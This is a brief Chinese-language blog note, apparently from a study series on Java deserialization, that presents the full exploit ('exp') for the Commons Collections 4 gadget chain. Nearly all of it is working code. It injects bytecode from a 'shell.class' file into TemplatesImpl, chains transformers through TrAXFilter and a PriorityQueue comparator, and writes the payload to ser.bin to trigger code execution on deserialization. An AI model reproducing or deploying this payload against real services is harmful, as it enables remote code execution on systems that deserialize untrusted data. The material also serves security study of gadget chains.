环境准备

和cc链2一个环境

分析

cc链4就是cc3和cc2的结合(个人认为)直接贴exp了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
import com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl;
import com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter;
import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;
import org.apache.commons.collections4.Transformer;
import org.apache.commons.collections4.comparators.TransformingComparator;
import org.apache.commons.collections4.functors.ChainedTransformer;
import org.apache.commons.collections4.functors.ConstantTransformer;
import org.apache.commons.collections4.functors.InstantiateTransformer;

import javax.xml.transform.Templates;
import java.io.FileInputStream;
import java.io.FileOutputStream;
import java.io.ObjectInputStream;
import java.io.ObjectOutputStream;
import java.lang.reflect.Field;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.util.PriorityQueue;

public class cc4 {
    public static void main(String[] args) throws Exception {
        TemplatesImpl templates = new TemplatesImpl();
        Class aClass = templates.getClass();
        Field _name = aClass.getDeclaredField("_name");
        _name.setAccessible(true);
        _name.set(templates, "cc4");
        byte[] b = Files.readAllBytes(Paths.get("D:\\Desktop\\java\\javacc\\target\\classes\\shell.class"));
        byte[][] b1 = {b};
        Field b2 = aClass.getDeclaredField("_bytecodes");
        b2.setAccessible(true);
        b2.set(templates, b1);

        Field f = aClass.getDeclaredField("_tfactory");
        f.setAccessible(true);
        f.set(templates, new TransformerFactoryImpl());

        Transformer[] T = {
                new ConstantTransformer(TrAXFilter.class),
                new InstantiateTransformer(new Class[]{Templates.class},new Object[]{templates})
        };

        ChainedTransformer chainedTransformer = new ChainedTransformer(T);

        TransformingComparator transformingComparator = new TransformingComparator(chainedTransformer);
        PriorityQueue priorityQueue = new PriorityQueue(111);
        priorityQueue.add(1);
        priorityQueue.add(2);
        Class aClass1 = priorityQueue.getClass();
        Field ca = aClass1.getDeclaredField("comparator");
        ca.setAccessible(true);
        ca.set(priorityQueue, transformingComparator);
        seriliaze(priorityQueue);
        unserilize("ser.bin");


    }

    public static void seriliaze(Object o) throws Exception {
        ObjectOutputStream objectOutputStream = new ObjectOutputStream(new FileOutputStream("ser.bin"));
        objectOutputStream.writeObject(o);
    }

    public static Object unserilize(String filename) throws Exception {
        ObjectInputStream objectInputStream = new ObjectInputStream(new FileInputStream(filename));
        return objectInputStream.readObject();
    }
}